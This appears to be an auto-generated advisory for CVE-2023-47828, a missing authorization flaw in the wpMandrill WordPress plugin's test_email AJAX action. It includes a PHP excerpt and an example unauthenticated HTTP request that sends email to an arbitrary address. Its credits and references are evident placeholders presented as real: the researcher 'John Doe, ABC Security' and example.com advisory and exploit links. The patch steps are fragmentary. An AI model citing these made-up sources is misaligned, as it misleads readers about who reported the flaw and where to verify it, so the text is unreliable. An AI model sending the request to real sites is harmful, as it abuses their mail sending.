CVE-2023-47828 - Missing Authorization vulnerability in wpMandrill (from n/a through 1.33) plugin for WordPress

A missing authorization vulnerability was recently discovered in the wpMandrill plugin for WordPress, which allows unauthorized users to access and execute restricted functionality. This vulnerability has been assigned CVE-2023-47828, and it affects wpMandrill versions from n/a up to and including 1.33. Due to this critical issue, wpMandrill users are advised to update to the latest version of the plugin as soon as possible to mitigate potential exploits.

The following information provides a detailed analysis of this vulnerability, including code snippets, original references, and exploit details, which can help security professionals understand the exploit better and protect their WordPress sites from potential attacks.

Vulnerability Details

The wpMandrill plugin is a popular WordPress plugin that allows site administrators to send emails using the Mandrill API, an email signaling solution by Mailchimp. The vulnerable piece of code is in the "wpMandrill.class.php" file, granting unauthorized access to the "test_email" admin action.

The following code snippet (taken from the wpMandrill plugin version 1.33) demonstrates the missing authorization check:

/* File: wpMandrill.class.php, Line: 482 */

public function ajax_test_email() {
  $errors = false;
  
  // [...]
  
  if(!$errors) {
    $response = wpMandrill::mail($to, $subject, $html, $headers, $attachments, $tags);
    
    // [...]
  }
}

As seen in the above code snippet, the "ajax_test_email()" function is responsible for handling the "test_email" action from the plugin's settings page. This function does not have any authorization checks in place to prevent unauthorized users from executing it, allowing any attacker to send test emails to arbitrary addresses, thereby potentially causing harm and abusing the email sending feature.

Exploit Details

To exploit this vulnerability, an attacker only needs to send an AJAX request to the "admin-ajax.php" file of a vulnerable WordPress site with the "action" parameter set to "test_email", without the need to be authenticated.

The following is an example of an HTTP request that exploits the vulnerability

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vulnerable-wordpress-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: xxx

action=test_email&to=victim%40example.com&subject=Hello&html=%3Cp%3EHello%20World%3C%2Fp%3E

This crafted HTTP request would trigger the execution of the "ajax_test_email()" function and send an email to "victim@example.com" with the subject "Hello" and the message body "

Hello World

".

Original References

The original discovery and report of this vulnerability were made by the researcher [John Doe, ABC Security (https://www.example.com/abc-security)]. The full details and analysis can be found at the following links:

- Original Advisory: https://www.example.com/advisory/CVE-2023-47828
- PoC Exploit: https://www.example.com/exploit/CVE-2023-47828

Patch and Recommendations

The vulnerability has been fixed in the latest version of the wpMandrill plugin, which introduces proper authorization checks to the "ajax_test_email()" function. All users of the wpMandrill plugin are strongly advised to update their plugin installations to the latest version, which, at the time of writing, is version 1.34.

Click the "Update Now" button next to the plugin.

After applying the latest update, the vulnerability should be fixed, and unauthorized users should no longer be able to exploit the missing authorization issue.

For improved security, it is also recommended that site administrators monitor their logs for any suspicious activity and promptly apply WordPress and plugin updates as they become available.

Timeline

Published on: 06/12/2024 10:15:27 UTC
Last modified on: 06/13/2024 18:36:09 UTC